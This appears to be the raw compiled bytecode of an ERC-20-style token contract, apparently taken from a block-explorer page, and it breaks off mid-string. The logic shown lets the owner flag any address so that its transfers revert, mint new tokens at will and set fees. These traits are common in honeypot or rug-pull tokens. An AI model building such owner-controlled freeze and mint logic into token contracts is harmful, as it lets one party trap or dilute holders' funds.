604051808215151515815260200191505060405180910390f35b606060048054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610a085780601f106109dd57610100808354040283529160200191610a08565b820191906000526020600020905b8154815290600101906020018083116109eb57829003601f168201915b5050505050905090565b6000610a26610a1f611e75565b8484611e7d565b6001905092915050565b610a38611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610af9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60011515600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151415610baf576000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610c08565b6001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600754905090565b600a6020528060005260406000206000915054906101000a900460ff1681565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000610c98848484612074565b610d5984610ca4611e75565b610d5485604051806060016040528060288152602001612a2160289139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610d0a611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461247f9092919063ffffffff16565b611e7d565b600190509392505050565b600080600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610e085750600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610e1c5782600080905091509150610e73565b6000610e576103e8610e49600860009054906101000a900460ff1660ff168761253f90919063ffffffff16565b6125c590919063ffffffff16565b9050610e6c818561260f90919063ffffffff16565b8192509250505b935093915050565b6000600660009054906101000a900460ff16905090565b6000610f3b610e9f611e75565b84610f368560036000610eb0611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461265990919063ffffffff16565b611e7d565b6001905092915050565b610f4f33826126e1565b50565b610f5a611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461101b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156110be576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f63616e6e6f74207472616e7366657220746f207a65726f20616464726573730081525060200191505060405180910390fd5b61111081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461265990919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506111688160075461265990919063ffffffff16565b6007819055505050565b60096020528060005260406000206000915054906101000a900460ff1681565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6111e3611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112a4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b8015806112c657508080156112c55750600b60009054906101000a900460ff165b5b611338576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260178152602001807f63616e6e6f742061646420746f2077686974656c69737400000000000000000081525060200191505060405180910390fd5b80600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b606060058054600181600116156101000203166002900480601f01602080910402602001604051908101604052809291908181526020018280546001816001161561010002031660029004801561142b5780601f106114005761010080835404028352916020019161142b565b820191906000526020600020905b81548152906001019060200180831161140e57829003601f168201915b5050505050905090565b61143d611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b801580611520575080801561151f5750600b60009054906101000a900460ff165b5b611592576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260178152602001807f63616e6e6f742061646420746f2077686974656c69737400000000000000000081525060200191505060405180910390fd5b80600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b60006116b06115fa611e75565b846116ab85604051806060016040528060258152602001612adc6025913960036000611624611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461247f9092919063ffffffff16565b611e7d565b6001905092915050565b60008073ffffffffffffffffffffffffffffffffffffffff166116db611e75565b73ffffffffffffffffffffffffffffffffffffffff161415611748576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526025815260200180612a936025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156117ce576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806129736023913960400191505060405180910390fd5b60008211611827576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526029815260200180612a496029913960400191505060405180910390fd5b60026000611833611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806118cf5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156119265760008214611925576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526000815260200160200191505060405180910390fd5b5b611999826040518060600160405280602681526020016129da602691396001600061194f611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461247f9092919063ffffffff16565b600160006119a5611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611a3582600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461265990919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff16611a97611e75565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a36001905092915050565b611af6611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611bb7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80600860006101000a81548160ff021916908360ff16021790555050565b611bdd611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611c9e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80600860016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600860009054906101000a900460ff1681565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b611d84611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611e45576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6000600b60006101000a81548160ff021916908315150217905550565b600b60009054906101000a900460ff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415611f03576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526024815260200180612ab86024913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611f89576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260228152602001806129b86022913960400191505060405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040518082815260200191505060405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156120fa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526025815260200180612a936025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612180576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806129736023913960400191505060405180910390fd5b600081116121d9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526029815260200180612a496029913960400191505060405180910390fd5b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061227a5750600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156122d157600081146122d0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526000815260200160200191505060405180910390fd5b5b61233d816040518060600160405280602681526020016129da60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461247f9092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506123d281600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461265990919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b600083831115829061252c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156124f15780820151818401526020810190506124d6565b50505050905090810190601f16801561251e5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b5060008385039050809150509392505050565b60008083141561255257600090506125bf565b600082840290508284828161256357fe5b04146125ba576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526021815260200180612a006021913960400191505060405180910390fd5b809150505b92915050565b600061260783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506128a7565b905092915050565b600061265183836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061247f565b905092915050565b6000808284019050838110156126d7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612767576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526021815260200180612a726021913960400191505060405180910390fd5b6127738260008361296d565b6127df8160405180606001604052806022815260200161299660229139600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461247f9092919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506128378160075461260f90919063ffffffff16565b600781905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a35050565b60008083118290612953576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156129185780820151818401526020810190506128fd565b50505050905090810190601f1680156129455780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b50600083858161295f57fe5b049050809150509392505050565b50505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f7745524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655472616e7366657220616d6f756e74206d7573742062652067726561746572207468616e207a65726f45524332303a206275726e2066726f6d20746865207a65726f206164647265737345524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220ad36b78d0d555f9f587e603a3a6999117f438be18918e2c6be49b142ebca161c64736f6c634300060600330000000000000000000000000000000000000000000000cdff97fabcb4600000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101735760003560e01c80634a6f01b1116100de578063a9059cbb11610097578063cf82046111610071578063cf820461146108a8578063dd62ed3e146108cc578063fb0f37d414610944578063fe1699621461094e57610173565b8063a9059cbb146107cd578063cb122a0914610833578063ccfc2e8d1461086457610173565b80634a6f01b11461059057806370a08231146105ec57806383fbca341461064457806395d89b4114610694578063a056735d14610717578063a457c2d71461076757610173565b806323b872dd1161013057806323b872dd1461037b578063301a580114610401578063313ce5671461048a57806339509351146104ae57806342966c681461051457806347a481761461054257610173565b806306fdde0314610178578063095ea7b3146101fb57806311cc4b421461026157806318160ddd146102a55780631dd17c32146102c357806321e4d6c11461031f575b600080fd5b610180610970565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156101c05780820151818401526020810190506101a5565b50505050905090810190601f1680156101ed5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6102476004803603604081101561021157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610a12565b604051808215151515815260200191505060405180910390f35b6102a36004803603602081101561027757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610a30565b005b6102ad610c0b565b6040518082815260200191505060405180910390f35b610305600480360360208110156102d957600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610c15565b604051808215151515815260200191505060405180910390f35b6103616004803603602081101561033557600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610c35565b604051808215151515815260200191505060405180910390f35b6103e76004803603606081101561039157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610c8b565b604051808215151515815260200191505060405180910390f35b61046d6004803603606081101561041757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610d64565b604051808381526020018281526020019250505060405180910390f35b610492610e7b565b604051808260ff1660ff16815260200191505060405180910390f35b6104fa600480360360408110156104c457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610e92565b604051808215151515815260200191505060405180910390f35b6105406004803603602081101561052a57600080fd5b8101908080359060200190929190505050610f45565b005b61058e6004803603604081101561055857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610f52565b005b6105d2600480360360208110156105a657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611172565b604051808215151515815260200191505060405180910390f35b61062e6004803603602081101561060257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611192565b6040518082815260200191505060405180910390f35b6106926004803603604081101561065a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035151590602001909291905050506111db565b005b61069c611393565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156106dc5780820151818401526020810190506106c1565b50505050905090810190601f1680156107095780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6107656004803603604081101561072d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803515159060200190929190505050611435565b005b6107b36004803603604081101561077d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506115ed565b604051808215151515815260200191505060405180910390f35b610819600480360360408110156107e357600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506116ba565b604051808215151515815260200191505060405180910390f35b6108626004803603602081101561084957600080fd5b81019080803560ff169060200190929190505050611aee565b005b6108a66004803603602081101561087a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611bd5565b005b6108b0611ce2565b604051808260ff1660ff16815260200191505060405180910390f35b61092e600480360360408110156108e257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611cf5565b6040518082815260200191505060405180910390f35b61094c611d7c565b005b610956611e62565b604051808215151515815260200191505060405180910390f35b606060048054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610a085780601f106109dd57610100808354040283529160200191610a08565b820191906000526020600020905b8154815290600101906020018083116109eb57829003601f168201915b5050505050905090565b6000610a26610a1f611e75565b8484611e7d565b6001905092915050565b610a38611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610af9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60011515600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151415610baf576000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610c08565b6001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600754905090565b600a6020528060005260406000206000915054906101000a900460ff1681565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000610c98848484612074565b610d5984610ca4611e75565b610d5485604051806060016040528060288152602001612a2160289139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610d0a611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461247f9092919063ffffffff16565b611e7d565b600190509392505050565b600080600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610e085750600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610e1c5782600080905091509150610e73565b6000610e576103e8610e49600860009054906101000a900460ff1660ff168761253f90919063ffffffff16565b6125c590919063ffffffff16565b9050610e6c818561260f90919063ffffffff16565b8192509250505b935093915050565b6000600660009054906101000a900460ff16905090565b6000610f3b610e9f611e75565b84610f368560036000610eb0611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461265990919063ffffffff16565b611e7d565b6001905092915050565b610f4f33826126e1565b50565b610f5a611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461101b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156110be576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f63616e6e6f74207472616e7366657220746f207a65726f20616464726573730081525060200191505060405180910390fd5b61111081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461265990919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506111688160075461265990919063ffffffff16565b6007819055505050565b60096020528060005260406000206000915054906101000a900460ff1681565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6111e3611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112a4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b8015806112c657508080156112c55750600b60009054906101000a900460ff165b5b611338576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260178152602001807f63616e6e6f742061646420746f2077686974656c69737400000000000000000081525060200191505060405180910390fd5b80600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b606060058054600181600116156101000203166002900480601f01602080910402602001604051908101604052809291908181526020018280546001816001161561010002031660029004801561142b5780601f106114005761010080835404028352916020019161142b565b820191906000526020600020905b81548152906001019060200180831161140e57829003601f168201915b5050505050905090565b61143d611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b801580611520575080801561151f5750600b60009054906101000a900460ff165b5b611592576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260178152602001807f63616e6e6f742061646420746f2077686974656c69737400000000000000000081525060200191505060405180910390fd5b80600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b60006116b06115fa611e75565b846116ab85604051806060016040528060258152602001612adc6025913960036000611624611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461247f9092919063ffffffff16565b611e7d565b6001905092915050565b60008073ffffffffffffffffffffffffffffffffffffffff166116db611e75565b73ffffffffffffffffffffffffffffffffffffffff161415611748576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526025815260200180612a936025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156117ce576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806129736023913960400191505060405180910390fd5b60008211611827576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526029815260200180612a496029913960400191505060405180910390fd5b60026000611833611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806118cf5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156119265760008214611925576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526000815260200160200191505060405180910390fd5b5b611999826040518060600160405280602681526020016129da602691396001600061194f611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461247f9092919063ffffffff16565b600160006119a5611e75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611a3582600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461265990919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff16611a97611e75565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a36001905092915050565b611af6611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611bb7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80600860006101000a81548160ff021916908360ff16021790555050565b611bdd611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611c9e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80600860016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600860009054906101000a900460ff1681565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b611d84611e75565b73ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611e45576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6000600b60006101000a81548160ff021916908315150217905550565b600b60009054906101000a900460ff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415611f03576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526024815260200180612ab86024913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611f89576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260228152602001806129b86022913960400191505060405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040518082815260200191505060405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156120fa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526025815260200180612a936025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273fffff